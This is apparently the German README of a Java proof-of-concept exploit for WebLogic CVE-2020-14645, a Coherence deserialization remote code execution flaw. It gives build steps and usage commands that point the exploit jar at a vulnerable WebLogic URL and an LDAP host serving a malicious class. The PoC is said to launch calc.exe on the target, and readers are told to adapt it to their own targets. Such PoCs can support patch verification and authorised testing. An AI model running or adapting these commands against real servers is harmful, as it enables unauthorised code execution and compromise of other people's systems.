Java-PoC für WebLogic CVE-2020-14645 Coherence-Deserialisierungs-RCE. Stellt eine bösartige Klasse über LDAP bereit und löst Remote-Codeausführung auf anfälligen WebLogic-Servern aus.
Maven 3
JDK 1.8
mvn package
Die konkreten Testschritte:
Da diese Schwachstelle der Apache Dubbo Schwachstelle ähnelt, beziehen Sie sich bitte auf diese Schwachstelle, um die Schritte 1-4 umzusetzen.
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL
# Beispiel
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002
Wenn die in diesem Beispiel bereitgestellte POC verwendet wird, führt das getestete Ziel nach erfolgreicher Ausnutzung calc.exe aus. Bitte passen Sie die POC selbst entsprechend der Umgebung des Testziels an.
Dieses Projekt bezieht sich auf und zitiert Teile des Codes der Projekte @Y4er @5up3rc, wofür wir uns hiermit bedanken!